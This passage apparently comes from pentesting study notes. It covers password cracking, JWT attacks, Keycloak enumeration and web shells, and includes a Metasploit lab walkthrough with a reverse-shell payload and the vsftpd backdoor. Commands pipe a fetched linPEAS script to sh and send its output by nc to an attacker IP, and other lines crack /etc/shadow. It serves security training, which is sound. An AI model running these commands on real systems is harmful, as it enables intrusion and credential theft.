    ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#basic-usage","title":"Basic usage","text":"
    # Syntax. Three steps:\n# 1. Extract hash from file\n<tool> <file_to_crack> > file.hash\n# 2. Crack the hash\njohn file.hash\n# 3. Another way to crack the hash\njohn --wordlist=<wordlist.txt> file.hash \n\n# Example with a pdf:\n# 1. Extract hash from file\npdf2john server_doc.pdf > server_doc.hash\n# 2. Crack the hash\njohn server_doc.hash\n# 3. Another way to crack the hash\njohn --wordlist=<wordlist.txt> server_doc.hash \n
    ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#brute-forcing-etcpasswd-and-etcshadow","title":"Brute forcing /etc/passwd and /etc/shadow","text":"

First, save /etc/passwd and /etc/shadow from the victim machine to the attacker machine.

    Second, use unshadow to put users and passwords in the same file:

    unshadow passwd shadow > crackme\n# passwd: file saved with /etc/passwd content.\n# shadow: file saved with /etc/shadow content.\n

Third, run John the Ripper. You can brute force a list of users or specific ones:

john -incremental -users:<userList> <fileToCrack>\n\n# To display the passwords recovered:\njohn --show crackme\n\n# Default path to cracked passwords: /root/.john/john.pot\n\n# Dictionary attack\njohn -wordlist=<file> -users=victim1,victim2 -rules <filetocrack>\n# the -rules parameter adds some mangling to the wordlist\n
    ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#cracking-password-of-microsoft-word-file","title":"Cracking Password of Microsoft Word file","text":"
    cd /root/Desktop/\n/usr/share/john/office2john.py MS_Word_Document.docx > hash\ncat hash\njohn --wordlist=/root/Desktop/wordlists/1000000-password-seclists.txt hash\n
    ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#cracking-password-of-a-zip-file","title":"Cracking password of a zip file","text":"
    zip2john nameoffile.zip > zip.hashes\ncat zip.hashes\njohn zip.hashes\n
    ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"jwt-tool/","title":"JWT tool","text":""},{"location":"jwt-tool/#jwt-attacks","title":"JWT attacks","text":"

Two tools: jwt.io (web-based) and jwt_tool (CLI).

To see a JWT decoded on your CLI:

    jwt_tool eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0IjoxNjY5NDYxODk5LCJleHAiOjE2Njk\n1NDgyOTl9.yeyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0IjoxNjY5NDYxODk5LCJleHAiOjE2Njk121Lj2Doa7rA9oUQk1Px7b2hUCMQJeyCsGYLbJ8hZMWc7304aX_hfkLB__1o2YfU49VajMBhhRVP_OYNafttug \n

jwt_tool prints the decoded header, payload, and signature values.

Also, since each part of a JWT is Base64-encoded, we can decode the header and payload with echo:

    echo eyJhbGciOiJIUzUxMiJ9 | base64 -d  && echo eyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0\nIjoxNjY5NDYxODk5LCJleHAiOjE2Njk1NDgyOTl9 | base64 -d\n

    Results:

    {\"alg\":\"HS512\"}{\"sub\":\"hapihacker@hapihacher.com\",\"iat\":1669461899,\"exp\":1669548299} \n

    To run a JWT scan with jwt_tool, run:

    jwt_tool -t <http://target-site.com/> -rh \"<Header>: <JWT_Token>\" -M pb\n# in the target site specify a path that leverages a call to a token\n# replace Header with the name of the Header and JWT_Tocker with the actual token.\n# -M: Scanning mode. 'pb' is playbook audit. 'er': fuzz existing claims to force errors. 'cc': fuzz common claims. 'at': All tests.\n


    Some more jwt_tool flags that may come in hand:

    # -X EXPLOIT, --exploit EXPLOIT\n#                        eXploit known vulnerabilities:\n#                        a = alg:none\n#                        n = null signature\n#                        b = blank password accepted in signature\n#                        s = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)\n#                        k = key confusion (specify public key with -pk)\n#                        i = inject inline JWKS\n
    "},{"location":"jwt-tool/#the-none-attack","title":"The none attack","text":"

    A JWT with \"none\" as its algorithm is a free ticket. Modify user and become admin, root,... Also, in poorly implemented JWT, sometimes user and password can be found in the payload.

    To craft a jwt with \"none\" as the value for \"alg\", run:

    jwt_tool <JWT_Token> -X a\n
    "},{"location":"jwt-tool/#the-null-signature-attack","title":"The null signature attack","text":"

The second attack in this section removes the signature from the token. This is done by erasing the signature altogether while leaving the trailing period in place.
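
jwt_tool automates this with the null-signature exploit flag listed above:

jwt_tool <JWT_Token> -X n\n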

    "},{"location":"jwt-tool/#the-blank-password-accepted-in-signature","title":"The blank password accepted in signature","text":"

Launching this attack is relatively simple: re-sign the token using a blank (empty) secret and check whether the server still accepts it.

    Also, with jwt_tool, run:

    jwt_tool <JWT_Token> -X b\n
    "},{"location":"jwt-tool/#the-algorithm-switch-or-key-confusion-attack","title":"The algorithm switch (or key-confusion) attack","text":"

    A more likely scenario than the provider accepting no algorithm is that they accept multiple algorithms. For example, if the provider uses RS256 but doesn\u2019t limit the acceptable algorithm values, we could alter the algorithm to HS256. This is useful, as RS256 is an asymmetric encryption scheme, meaning we need both the provider\u2019s private key and a public key in order to accurately hash the JWT signature. Meanwhile, HS256 is symmetric encryption, so only one key is used for both the signature and verification of the token. If you can discover the provider\u2019s RS256 public key and then switch the algorithm from RS256 to HS256, there is a chance you may be able to leverage the RS256 public key as the HS256 key.

    jwt_tool <JWT_Token> -X k -pk public-key.pem\n# You will need to save the captured public key as a file on your attacking machine.\n
    "},{"location":"jwt-tool/#the-jwt-crack-attack","title":"The jwt crack attack","text":"

JWT_Tool can test 12 million passwords in under a minute. To perform a JWT Crack attack using JWT_Tool, use the following command:

    jwt_tool <JWT Token> -C -d /wordlist.txt\n# -C indicates that you are conducting a hash crack attack\n# -d specifies the dictionary or wordlist\n

    You can generate this wordlist for the secret signature of the json web token by using crunch.
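
For instance, a sketch with crunch (the length range and charset are arbitrary choices to adapt to your target):

# Generate all 4- to 6-character lowercase-alphanumeric candidates\ncrunch 4 6 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txt\n\n# Then crack the JWT secret with it\njwt_tool <JWT_Token> -C -d wordlist.txt\n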

Once you crack the secret of the signature, we can create our own trusted tokens: 1. Grab another user's email (in the crAPI app, from the data exposure vulnerability when retrieving the forum: GET {{baseUrl}}/community/api/v2/community/posts/recent). 2. Generate a token with the secret.

    "},{"location":"jwt-tool/#spoofing-jwks","title":"Spoofing JWKS","text":"

Specify the JWKS URL with -ju, or set it in jwtconf.ini to automate this attack.

    "},{"location":"jwt-tool/#inject-inline-jwks","title":"Inject inline JWKS","text":""},{"location":"kernel-vulnerability-exploitation/","title":"Kernel vulnerability exploitation","text":"System vulnerability Exploit Ubuntu 16.04 LTS Exploit 39772 Ubuntu 18.04 LTS + lxd lxd privilege escalation","tags":["pentesting","privilege escalation","linux"]},{"location":"keycloak-pentesting/","title":"Pentesting Keycloak","text":"

    Keycloak is an open-source Identity and Access Management (IAM) solution. It allows easy implementation of single sign-on for web applications and APIs.

    Sources
    • https://www.surecloud.com/resources/blog/pentesting-keycloak-part-1
    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#fingerprint-and-enumeration","title":"Fingerprint and enumeration","text":"","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#keycloak-running","title":"Keycloak running...","text":"

For assessing an environment running Keycloak, we first need to fingerprint it, that is, identify that we are facing a Keycloak implementation and determine which version is running. For that:

    1. Cookie Name \u2013 Once logged in with valid credentials, pay attention to cookies.
    2. URLs: Keycloak has a very distinctive URL.
    3. JWT Payload: Even if this is an OAuth requirement, the JWT could also give you a hint that you\u2019re using Keycloak, just by looking at sections like \u2018resource_access\u2019 and \u2018scope\u2019.
4. Page Source: Finally, you might also find references to /keycloak/ in the source code of the login page.
    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#version","title":"Version","text":"

    At the moment, there is no way to identify the running Keycloak version by looking at it from an unauthenticated perspective. The only way is via an administrative account (with the correct JWT token in the request header): GET /auth/admin/serverinfo.
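
A sketch of that request with curl (host and token are placeholders):

curl -s -H \"Authorization: Bearer <admin_JWT>\" https://<host>/auth/admin/serverinfo\n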

    The latest stable version of Keycloak is available at https://www.keycloak.org/downloads \u2013 Make sure the client is running the latest. If not, check if there are public CVEs and/or exploits on:

    https://repology.org/project/keycloak/cves https://www.cvedetails.com/version-list/16498/37999/1/Keycloak-Keycloak.html https://www.exploit-db.com/

    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#enumeration","title":"Enumeration","text":"","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#openid-configuration-saml-descriptor","title":"OpenID Configuration / SAML Descriptor","text":"
/auth/realms/<realm_name>/.well-known/openid-configuration\n/auth/realms/<realm_name>/protocol/saml/descriptor\n

    For public keys:

    /auth/realms/<realm_name>/\n
    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#realms","title":"Realms","text":"

    A realm manages a set of users, credentials, roles, and groups. A user belongs to and logs into a realm. Realms are isolated from one another and can only manage and authenticate the users that they control.

    When you boot Keycloak for the first time, Keycloak creates a pre-defined realm for you. This initial realm is the master realm \u2013 the highest level in the hierarchy of realms. Admin accounts in this realm have permissions to view and manage any other realm created on the server instance. When you define your initial admin account, you create an account in the master realm. Your initial login to the admin console will also be via the master realm.

    It is not recommended to configure a web application\u2019s SSO on the default master realm for security and granularity. Realms can be easily enumerated, but that\u2019s a default behaviour of the platform. Obtaining a list of valid realms might be useful later on in the assessment.

    It is possible to enumerate via Burp Suite Intruder on the following URL:

    /auth/realms/<realm_name>/\n

    A possible dictionary: https://raw.githubusercontent.com/chrislockard/api_wordlist/master/objects.txt.
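
The same enumeration can also be sketched from the CLI with ffuf (the tool choice and the match option are ours to tune per target):

ffuf -w objects.txt -u https://<host>/auth/realms/FUZZ/ -mc 200\n# Valid realms return a JSON document containing the realm name and public key\n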

Realms can be configured to allow user self-registration. This is not an issue in itself and is often advertised on the login page:

    If the application is using a custom template for the login page, hiding the registration link, we can still try to directly access the registration link, which is:

/auth/realms/<realm_name>/login-actions/registration?client_id=<client_id>&tab_id=<tab_id>

    Of course, disabling self-registration in a production environment is recommended.

    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#clients-id","title":"Clients ID+","text":"

    Clients are entities that can request Keycloak to authenticate a user. Most often, clients are applications and services that want to use Keycloak to secure themselves and provide a single sign-on solution. Clients can also be entities that just want to request identity information or an access token so that they can securely invoke other services on the network that Keycloak secures.

    Each realm (identified below) might have a different set of client ids.

    When landing on a login page of a realm, the URL will be auto-filled with the default \u2018client_id\u2019 and \u2018scope\u2019 parameters, e.g.:

    /auth/realms/<realm_name>/protocol/openid-connect/auth?**client_id=account-console**&redirect_uri=<...>&state=<...>&response_mode=<...>&response_type=<...>&**scope=openid**&nonce=<...>&code_challenge=<...>&code_challenge_method=<...>\n

    We can use here some dictionaries.

    Additionally, the following default client ids should also be available upon Keycloak installation:

    account\naccount-console\naccounts\naccounts-console\nadmin\nadmin-cli\nbroker\nbrokers\nrealm-management\nrealms-management\nsecurity-admin-console\n

No HTTP response code helps us distinguish a valid client_id from an invalid one. We should focus instead on whether the length of the response differs from the majority of the responses.

    This process should be repeated for each valid realm identified in previous steps.

    Clients can be configured with different Access Types:

• Bearer-Only: Used for backend servers and APIs (requests that already contain a token/secret in the request header)
• Public: Able to initiate a login flow (the auth flow to get an access token) and does not hold or send any secrets
• Confidential: Used for backend servers; able to initiate a login flow and can accept or send secrets.

    Therefore, when we encounter a \u201cclient_secret\u201d parameter in the login request, we\u2019re probably looking at a client with a Confidential or Bearer-Only Access Type.

    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#scopes","title":"Scopes","text":"

    When a client is registered, you must define protocol mappers and role scope mappings for that client. It is often useful to store a client scope to make creating new clients easier by sharing some common settings. This is also useful for requesting some claims or roles to be conditionally based on the value of the scope parameter. Keycloak provides the concept of a client scope for this.

    When landing on a login page of a realm, the URL will be auto-filled with the default \u2018client_id\u2019 and \u2018scope\u2019 parameters, e.g.:

    /auth/realms/<realm_name>/protocol/openid-connect/auth?**client_id=account-console**&redirect_uri=<...>&state=<...>&response_mode=<...>&response_type=<...>&**scope=openid**&nonce=<...>&code_challenge=<...>&code_challenge_method=<...>\n

    It is possible to identify additional scopes via Burp Suite Intruder, by keeping all the other parameters with the same value:

    The following, additional, default scopes should also be available upon KeyCloak installation:

    address  \naddresses  \nemail  \nemails  \nmicroprofile-jwt  \noffline_access  \nphone  \nopenid  \nprofile  \nrole_list  \nroles  \nrole  \nweb-origin  \nweb-origins\n

It is quite straightforward to distinguish valid scopes from non-valid scopes by looking at the content length or status code.

    This process should be repeated for each realm identified in previous steps.

    It should be noted that valid scopes can be concatenated within the URL prior of the login, e.g.:

    ...&scope=openid+offline_access+roles+email+phone+profile+address+web-origins&...

This will 'force' Keycloak to grant any available/additional scopes for that realm, depending also on the user's role configuration.

    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#grants","title":"Grants","text":"

    OAuth 2 provides several \u2018grant types\u2019 for different use cases. The grant types defined are:

    • Authorization Code for apps running on a web server, browser-based and mobile apps
    • Password for logging in with a username and password (only for first-party apps)
    • Client credentials for application access without a user present
    • Implicit was previously recommended for clients without a secret, but has been superseded by using the Authorization Code grant with PKCE

A good resource to understand the use cases of grants is available from Aaron Parecki.

Grants cannot be enumerated and are as follows:

authorization_code\npassword\nclient_credentials\nrefresh_token\nimplicit\nurn:ietf:params:oauth:grant-type:device_code\nurn:openid:params:grant-type:ciba\n

    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#identity-provider","title":"Identity Provider","text":"

    Keycloak can be configured to delegate authentication to one or more Identity Providers (IDPs). Social login via Facebook or Google+ is an example of an identity provider federation. You can also hook Keycloak to delegate authentication to any other OpenID Connect or SAML 2.0 IDP.

    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#identity-provider-enumeration","title":"Identity Provider Enumeration","text":"

    There are a number of external identity providers that can be configured within Keycloak. The URL to use within Intruder is:

/auth/realms/<realm_name>/broker/<idp_name>/endpoint

The full list of default IDP names is as follows:

gitlab\ngithub\nfacebook\ngoogle\nlinkedin\ninstagram\nmicrosoft\nbitbucket\ntwitter\nopenshift-v4\nopenshift-v3\npaypal\nstackoverflow\nsaml\noidc\nkeycloak-oidc\n

    Once again, the status codes might differ, but the length will disclose which IDP is enabled. It should be noted that, by default, the login page will disclose which IDPs are enabled:

    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#roles","title":"Roles","text":"

    Roles identify a type or category of user. Admin, user, manager, and employee are all typical roles that may exist in an organization. Applications often assign access and permissions to specific roles rather than individual users as dealing with users can be too fine-grained and hard to manage.

    Roles cannot be easily enumerated from an unauthenticated perspective. They are usually visible within the JWT token of the user upon successful login:

Inspecting the JWT shows that the 'account' client_id has, by default, 2 roles.

    Realm Default Roles:

default-roles-<realm_name>\noffline_access\numa_authorization\n

    Client ID Default Roles:

manage-account\nmanage-account-links\ndelete-account\nmanage-content\nview-applications\nview-consent\nview-profile\nread-token\ncreate-client\nimpersonation\nmanage-authorization\nmanage-clients\nmanage-events\n

    ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#user-email-enumeration-auth","title":"User Email Enumeration (auth)","text":"

    It is possible to enumerate valid email addresses from an authenticated perspective via Keycloak\u2019s account page (if enabled for the logged-in user), available at:

/auth/realms/<realm_name>/account/#/personal-info

    When changing the email address to an already existing value, the system will return 409 Conflict. If the email is not in use, the system will return \u2018204 \u2013 No Content\u2019. Please note that, if Email Verification is enabled, this will send out a confirmation email to all email addresses we\u2019re going to test.

    This process can be easily automated via Intruder and no CSRF token is needed to perform this action:

    If the template of the account console was changed to not show the personal information page, you might want to try firing up the request via:

POST /auth/realms/<realm_name>/account/ HTTP/1.1\nHost: <host>\nContent-Type: application/json\nAuthorization: Bearer <JWT>\nOrigin: <origin>\nContent-Length: 635\nConnection: close\nCookie: <cookies>\n

    { \"id\": \"\", \"username\": \"myuser\", \"firstName\": \"my\", \"lastName\": \"user\", \"email\": \"\", \"emailVerified\": false, \"userProfileMetadata\": { \"attributes\": [ { \"name\": \"username\", \"displayName\": \"${username}\", \"required\": true, \"readOnly\": true, \"validators\": {} }, { \"name\": \"email\", \"displayName\": \"${email}\", \"required\": true, \"readOnly\": false, \"validators\": { \"email\": { \"ignore.empty.value\": true } } }, { \"name\": \"firstName\", \"displayName\": \"${firstName}\", \"required\": true, \"readOnly\": false, \"validators\": {} }, { \"name\": \"lastName\", \"displayName\": \"${lastName}\", \"required\": true, \"readOnly\": false, \"validators\": {} } ] }, \"attributes\": { \"locale\": [ \"en\" ] } }

The valid email addresses identified in this process can be used to perform brute force (explained in the exploitation part of Pentesting Keycloak Part Two). For this reason, access to Keycloak's account page should be disabled.

    ","tags":["wordpress","keycloak"]},{"location":"kiterunner/","title":"Kiterunner","text":"

Kiterunner is an excellent tool that was developed and released by Assetnote. It is currently the best tool available for discovering API endpoints and resources. While directory brute-force tools like Gobuster and Dirbuster discover URL paths, they typically rely on standard HTTP GET requests. Kiterunner will not only use all HTTP request methods common with APIs (GET, POST, PUT, and DELETE) but also mimic common API path structures. In other words, instead of requesting GET /api/v1/user/create, Kiterunner will try POST /api/v1/user/create, mimicking a more realistic request.

1. First, download the dictionaries from the project. In my case I downloaded them to /usr/share/wordlists/kiterunner/:

• https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz
• https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz
• https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz
• https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz

2. Run a quick scan of your target's URL or IP address like this:

kr scan http://127.0.0.1 -w ~/api/wordlists/data/kiterunner/routes-large.kite\n

Note that we conducted this scan without any authorization headers, which the target API likely requires.

    To use a dictionary (and not a kite file):

    kr brute <target> -w ~/api/wordlists/data/automated/nameofwordlist.txt\n

    If you have many targets, you can save a list of line-separated targets as a text file and use that file as the target.

One of the coolest Kiterunner features is the ability to replay requests: not only will you have an interesting result to investigate, you will also be able to dissect exactly why that request is interesting. To replay a request, copy the entire result line, pass it to the kb replay option, and include the wordlist you used:

    kr kb replay \"GET     414 [    183,    7,   8]://192.168.50.35:8888/api/privatisations/count 0cf6841b1e7ac8badc6e237ab300a90ca873d571\" -w ~/api/wordlists/data/kiterunner/routes-large.kite\n

    Running this will replay the request and provide you with the HTTP response.

To run Kiterunner providing an authorization token, such as \"x-access-token\", take the full token and add it to your Kiterunner scan with the -H option:

    kr scan http://IP -w /path/to/dict.txt -H 'x-access-token: eyJhGcwisdfdsfdfsdfsdfsdfdsfdsfddfdf.eyfakefakefakefaketokenfakeken._wcoooooo_kkkkkk_kkkk'\n
    "},{"location":"knockpy/","title":"knockpy - A subdomain scanner","text":"","tags":["pentesting","web pentesting","enumeration"]},{"location":"knockpy/#installation","title":"Installation","text":"

    Repository: https://github.com/guelfoweb/knock

    git clone https://github.com/guelfoweb/knock.git\ncd knock\npip3 install -r requirements.txt\n\n# Optional: Make an alias for knockpy\nsudo chmod +x knockpy.py \nsudo ln -s /home/kali/tools/knock/knockpy.py /usr/bin/knockpy\n
    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"knockpy/#usage","title":"Usage","text":"
    # From the tools/knock folder\npython3 knockpy.py <DOMAIN>\n\n# If you have made an alias, just run:\nknockpy <domain>\n
    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"lateral-movements/","title":"Lateral movements","text":"","tags":["pentesting"]},{"location":"lateral-movements/#using-metasploit","title":"using metasploit","text":"
1. Get our IP:
ip a\n# 192.64.166.2\n
2. Get the target machine IP:
    ping demo.ine.local\n# 192.64.166.3\n
3. Enumerate services on the target machine:
    nmap -sV -sS -O 192.64.166.3\n# open ports: 80 and 3306.\n
4. Go further on port 80:
nmap\n# In the scan you will see: V-CMS-Powered by V-CMS and PHPSESSID: httponly flag not set\n
5. Launch Metasploit and search for v-cms:
    service postgresql start\nmsfconsole -q\n
    search v-cms\n
6. Use the exploit exploit/linux/http/vcms_upload, configure it, and run it:
    use exploit/linux/http/vcms_upload\nshow options\n
    set RHOST 192.64.166.3\nset TARGETURI /\nset LHOST 192.64.166.2\nset payload php/meterpreter/reverse_tcp\nrun\n
7. You will get a limited meterpreter. Drop to a shell and print the flag:
    meterpreter> shell\n> cat /root/flag.txt\n# 4f96a3e848d233d5af337c440e50fe3d\n
8. Map other possible interfaces on the machine. Since ifconfig does not work, spawn a TTY shell with python and try again:
    ifconfig\u00a0\n# does not work\n
    ipconfig\n# does not work\n
    which python\n# it\u2019s located under /bin, so we can use python to spawn the shell\n
    python -c 'import pty; pty.spawn(\"/bin/bash\")'\n
    $root@machine> ifconfig\n# it tells us about another interface: 192.182.147.2\n
    ","tags":["pentesting"]},{"location":"lateral-movements/#route","title":"route","text":"
1. Add a route between interface 192.64.166.3 (meterpreter session 1) and the discovered interface 192.182.147.2 with the route utility:
    $root@machine> exit\n
meterpreter> run autoroute -s 192.182.147.0 -n 255.255.255.0\n# you can also add a route outside of meterpreter. In that case you need to specify the meterpreter session: route add 192.182.147.0 255.255.255.0 1\n
2. Background the meterpreter session and check that the route was added successfully to Metasploit's routing table:
    meterpreter> background\nmsf> route print\n
3. Run the auxiliary TCP port-scanning module to discover any available hosts (from .3 to .10) and check whether any of ports 80, 8080, 445, 21, and 22 are open on them:
msf> use auxiliary/scanner/portscan/tcp\n\nmsf auxiliary/scanner/portscan/tcp > set PORTS 80, 8080, 445, 21, 22\n\nmsf auxiliary/scanner/portscan/tcp > set RHOSTS 192.69.228.3-10\n\nmsf auxiliary/scanner/portscan/tcp > exploit\n# Gives us ports 21 and 22 open at 192.182.147.3\n
    ","tags":["pentesting"]},{"location":"lateral-movements/#portfwd","title":"portfwd","text":"
1. To reach the discovered target, we need to forward a remote machine port to a local port. We want to target port 21 of that machine, so we forward remote port 21 to local port 1234. This is done with the portfwd utility from meterpreter:
msf auxiliary/scanner/portscan/tcp > sessions -i 1\n\nmeterpreter> portfwd\n# Tells you there is none configured\n\nmeterpreter> portfwd add -l 1234 -p 21 -r 192.182.147.3\n# -l: local port\n# -p 21: the port we are targeting in our attack\n# -r: the remote host\n\nmeterpreter> portfwd list\n# Lists the active port forwards. Now, scan the local port using Nmap.\n
2. Run nmap on the forwarded local port to identify the service name:
    meterpreter> background\n\nmsf> nmap -sS -sV -p 1234 localhost\n# It tells you the ftp version: vsftpd 2.0.8 or later\n
3. Search for the vsftpd exploit module and exploit the target host using the vsftpd backdoor module:
msf > search vsftpd\nmsf> use exploit/unix/ftp/vsftpd_234_backdoor\nmsf exploit/unix/ftp/vsftpd_234_backdoor> set RHOSTS 192.69.228.3\nmsf exploit/unix/ftp/vsftpd_234_backdoor> exploit\n\n# Sometimes, the exploit fails the first time. If that happens, run it again.\n\n$> id\n# you are root.\n
4. Print the flag:
    $> cat /root/flag.txt\n# 58c7c29a8ab5e7c4c06256b954947f9a\n
    ","tags":["pentesting"]},{"location":"laudanum/","title":"Laudanum: Injectable Web Exploit Code","text":"

Laudanum is a repository of ready-made files that can be used to inject onto a victim and receive back access via a reverse shell, run commands on the victim host right from the browser, and more. The repo includes injectable files for many different web application languages, including asp, aspx, jsp, php, and more.

    ","tags":["pentesting","web pentesting","web shells"]},{"location":"laudanum/#installation","title":"Installation","text":"

    Pre-built in Kali.

    Download from github repo: https://github.com/jbarcia/Web-Shells/tree/master/laudanum.

    ","tags":["pentesting","web pentesting","web shells"]},{"location":"laudanum/#basic-usage","title":"Basic usage","text":"

The Laudanum files can be found in the /usr/share/webshells/laudanum directory. For most of the files within Laudanum, you can copy them as-is and place them where you need them on the victim to run. For specific files such as the shells, you must first edit the file to insert your attacking host IP address (see the sketch below).

    locate laudanum\n
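
For example, a sketch for the ASPX shell (the file path follows the Kali directory named above; the exact variable to edit may vary per shell):

# Copy a shell locally, then add your attacking IP to its allowed-IP list before uploading\ncp /usr/share/webshells/laudanum/aspx/shell.aspx /tmp/\nnano /tmp/shell.aspx\n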
    ","tags":["pentesting","web pentesting","web shells"]},{"location":"lazagne/","title":"Lazagne","text":"

The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.

    ","tags":["pentesting","web pentesting","passwords"]},{"location":"lazagne/#installation","title":"Installation","text":"

    Download from github repo: https://github.com/AlessandroZ/LaZagne.

    Download a standalone copy from https://github.com/AlessandroZ/LaZagne/releases/.

    ","tags":["pentesting","web pentesting","passwords"]},{"location":"lazagne/#basic-usage","title":"Basic usage","text":"

    Once Lazagne.exe is on the target, we can open command prompt or PowerShell, navigate to the directory the file was uploaded to, and execute the following command:

    C:\\Users\\username\\Desktop> start lazagne.exe all\n# -vv: to study what it is doing in the background.\n
    ","tags":["pentesting","web pentesting","passwords"]},{"location":"linenum/","title":"LinEnum - A tool to scan Linux system","text":"","tags":["pentesting","linux pentesting","enumeration"]},{"location":"linenum/#installation","title":"Installation","text":"

    Clone github repo: https://github.com/rebootuser/LinEnum

    ","tags":["pentesting","linux pentesting","enumeration"]},{"location":"linenum/#basic-usage","title":"Basic usage","text":"
./LinEnum.sh -s -r report -e /tmp/ -t\n# -k: Enter keyword\n# -e: Enter export location\n# -t: Include thorough (lengthy) tests\n# -s: Supply current user password to check sudo perms (INSECURE)\n# -r: Enter report name\n
    ","tags":["pentesting","linux pentesting","enumeration"]},{"location":"linpeas/","title":"linPEAS","text":"

LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. The checks are explained on book.hacktricks.xyz.

    ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linpeas/#installation","title":"Installation","text":"

    Github repo: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS.

An interesting feature is that you can execute it from memory and send the output back to the attacking host.
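
A sketch of both options (the release URL is the project's documented download path; IPs and ports are placeholders):

# Execute from memory, without touching disk\ncurl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh\n\n# Send output back to the attacking host\n# Attacker: nc -lvnp 9002 | tee linpeas.out\n# Victim:\ncurl -s http://10.10.14.2/linpeas.sh | sh | nc 10.10.14.2 9002\n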

    ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linux-exploit-suggester/","title":"Linux Exploit Suggester","text":"

Linux Exploit Suggester does pretty much what its name says: it helps detect security deficiencies for a given Linux kernel/Linux-based machine.

    ","tags":["pentesting","privilege escalation"]},{"location":"linux-exploit-suggester/#installation","title":"Installation","text":"

    Download from https://github.com/The-Z-Labs/linux-exploit-suggester.

You can also download it directly onto the victim's machine under a different name, let's say \"les.sh\":

    wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh\n
    ","tags":["pentesting","privilege escalation"]},{"location":"linux-exploit-suggester/#basic-commands","title":"Basic commands","text":"

    Execute it making sure of having execution permissions first:

    ./linux-exploit-suggester.sh\n

Also, a nice way to serve this payload is to copy the file into the /var/www/html folder of the attacker machine and then run:

    service apache2 start\n
    ","tags":["pentesting","privilege escalation"]},{"location":"linux-privilege-checker/","title":"Linux Privilege Checker","text":"

    Linux privilege checker is an enumeration tool with privilege escalation checking capabilities.

    ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linux-privilege-checker/#installation","title":"Installation","text":"

    Download from: http://www.securitysift.com/download/linuxprivchecker.py

    ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linux-privilege-checker/#basic-commands","title":"Basic commands","text":"

    You can run it on your system by typing:

     ./linuxprivchecker.py \n

    or

    python linuxprivchecker.py\n

Also, a nice way to serve this payload is to copy the python file into /var/www/html and then run:

    service apache2 start\n
    ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linux/","title":"Linux","text":"","tags":["linux"]},{"location":"linux/#find-sensitive-files","title":"Find sensitive files","text":"","tags":["linux"]},{"location":"linux/#configuration-files","title":"Configuration files","text":"
    # Return files with extension .conf, .config and .cnf, which in linux are configuration files.\nfor l in $(echo \".conf .config .cnf\");do echo -e \"\\nFile extension: \" $l; find / -name *$l 2>/dev/null | grep -v \"lib\\|fonts\\|share\\|core\" ;done\n\n\n# Search for three words (user, password, pass) in each file with the file extension .cnf.\nfor i in $(find / -name *.cnf 2>/dev/null | grep -v \"doc\\|lib\");do echo -e \"\\nFile: \" $i; grep \"user\\|password\\|pass\" $i 2>/dev/null | grep -v \"\\#\";done\n
    ","tags":["linux"]},{"location":"linux/#databases","title":"Databases","text":"
    # Search for databases\nfor l in $(echo \".sql .db .*db .db*\");do echo -e \"\\nDB File extension: \" $l; find / -name *$l 2>/dev/null | grep -v \"doc\\|lib\\|headers\\|share\\|man\";done\n
    ","tags":["linux"]},{"location":"linux/#scripts","title":"Scripts","text":"
    for l in $(echo \".py .pyc .pl .go .jar .c .sh\");do echo -e \"\\nFile extension: \" $l; find / -name *$l 2>/dev/null | grep -v \"doc\\|lib\\|headers\\|share\";done\n
    ","tags":["linux"]},{"location":"linux/#files-including-the-txt-file-extension-and-files-that-have-no-file-extension-at-all","title":"Files including the .txt file extension and files that have no file extension at all","text":"

Admins may change the names of configuration files, but you can still try to find them:

    find /home/* -type f -name \"*.txt\" -o ! -name \"*.*\"\n
    ","tags":["linux"]},{"location":"linux/#cronjobs","title":"cronjobs","text":"

